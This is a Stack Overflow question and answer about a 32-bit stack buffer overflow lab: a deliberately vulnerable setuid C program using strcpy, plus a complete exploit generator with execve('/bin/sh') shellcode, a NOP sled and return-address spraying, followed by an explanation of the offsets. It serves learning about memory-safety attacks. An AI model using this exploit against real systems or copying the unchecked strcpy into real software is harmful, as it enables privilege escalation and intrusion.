C - Buffer Overflow Details

Question

This particular problem has been addressed a few times here on Stack Overflow, but I cannot find any previous post that addresses some questions that I have. I would like to note that I have read Aleph One's "Smashing the Stack for Fun and Profit", but there are still gaps in my understanding.

My question is: This works (spawns a root shell) for various sizes of the buffer in bof() in stack.c, from buffer[12] to buffer[24]. Why does it not work (it seg faults) for buffer[48], for example? Or, how would the program need to be modified to make it work for such buffers?

Please note that the following commands are used when compiling stack.c

# gcc -o stack -z execstack -fno-stack-protector stack.c
# chmod 4755 stack

And ASLR is OFF.

First, let's look at the vulnerable program: stack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

And the program to exploit this: test.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// code to spawn a shell
char shellcode[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
    FILE *badfile;
    char *ptr;
    long *a_ptr;
    long *ret;

    int offset = 450;
    int bsize = 517;

    char buffer[bsize];

    // a_ptr will store the return address
    ptr = buffer;
    a_ptr = (long *) ptr;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, bsize);

    /* Fill buffer with appropriate contents */
    printf("Stack Pointer (ESP): 0x%x\n", get_sp());

    ret = get_sp() + offset;
    printf("Address: 0x%x\n", ret);

    int i;
    for (i = 0; i < 350; i += 4)
        *(a_ptr++) = ret;

    for (i = 450; i < sizeof(shellcode) + 450; i++)
        buffer[i] = shellcode[i-450];

    buffer[bsize - 1] = '\0';
    /*Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

Below I will try to explain what I think is going on, and jot down notes as to where I believe the gaps in my knowledge are. If anyone has time to go over this as well as answer the question as stated earlier, then thank you.

Clearly, the buffer[12] in stack.c is going to be overflowed when strcpy() is called, because a string of size 517 is being copied into a buffer of size 12.

In test.c, I understand that we are creating the malicious buffer which is to be read by stack.c. This buffer is initialized with a bunch of NOPs (0x90). Beyond that, I am a bit confused.

1) What is the point of the offset being added to ret in ret = get_sp() + offset;? Also, why is offset = 450? I have tried other values for the offset and this program has still run (such as 460). 450 seems like a guess that happens to work.

2) At for (i = 0; i < 350; i += 4), why is 350 used? I don't understand the point of this value. I believe that this loop is filling the first 350 bytes of the buffer with the return address ret, but I do not understand why it is 350 bytes. I believe that we are increasing i by 4 each time because (long *) is 4 bytes. If this is true, shouldn't this 350 also be a multiple of 4?

3) Again, at for (i = 450; i < sizeof(shellcode) + 450; i++) (sizeof(shellcode) is 25), why do we start at 450 in the buffer? This is saying we are filling buffer[450] through buffer[474] with the shell code. Currently, everything after that should be initialized to a NOP. So what? Why 450 to 474?

Multiple questions in one, unclear, too broad and potential malware. This down/close vote is just too easy.
– Martin James, Commented Oct 14, 2015 at 22:49
Potential malware? Anyway, I edited the post @MartinJames. Please help me improve the post further, if it needs it.
– binker, Commented Oct 14, 2015 at 22:51

Davislor · Accepted Answer · 2015-10-14 23:09:21Z

Keep in mind that, in a 32-bit x86 program such as this, the bytes on top of the stack hold, from lowest address on up: local variables, the return address of the function, its parameters, any registers saved by the caller, the caller’s local variables, etc.

The loop actually writes 88 four-byte return addresses, 352 bytes in total, to the top of the stack: i takes the values 0, 4, ..., 348, and each iteration stores four bytes. (The code predates C99 and x86_64 and therefore assumes that long is exactly 32 bits.) The purpose of this is just to ensure that, for any plausible amount of storage for local variables, the return address will get overwritten. It also tries to handle the case where the function with the vulnerability gets called from several levels deep and the top of the stack is no longer the same. Then there’s some padding with nop instructions, because if the function return lands anywhere in there, the CPU will just skip them. Finally, there’s the shell code, in machine language. The whole point is to get the return address to point anywhere in this part of the buffer. Note that this will only work if the exploit code can be sure that the address of the stack pointer in the caller’s address space is similar. Address-space randomization is a technique to defeat this.

In other words, the code repeats itself a few hundred times because stuff might not be at exactly the same place in a new process, and this way, it still works if the stack pointer is anywhere close to where it expects. The values are ballpark figures, but Aleph One talks about how to find them.


7 Comments

binker Over a year ago

Could you clarify -- You said that the code repeats itself a few hundred times. From what I can tell, the shellcode is only placed in the buffer once, and a return address is stored a couple hundred times. Does this imply that the return address being written to the buffer in test.c is supposed to point to somewhere in the shell code?

Davislor Over a year ago

Correct. The point is to overwrite the return address with the (guessed) address of the shell code, so that, on return, the program will run the shell code instead of resuming from where the call was made. However, it doesn’t know exactly where the return address or the shell code are.

Davislor Over a year ago

Oh, and buffer sizes that aren’t multiples of 4 don’t work here because the 4-byte return addresses don’t come out aligned.

binker Over a year ago

The address of the shell code shouldn't have to be guessed though, I would think, since we know where we are placing it in the buffer. Also, I would like to state that your post has been helpful to me, but I think you may have been writing your answer while I edited the main post to focus on one question (which is now at the top of my post).

binker Over a year ago

I see your comment about buffer sizes needing to be multiples of 4. However, this same code does not work for, say, buffer[32]
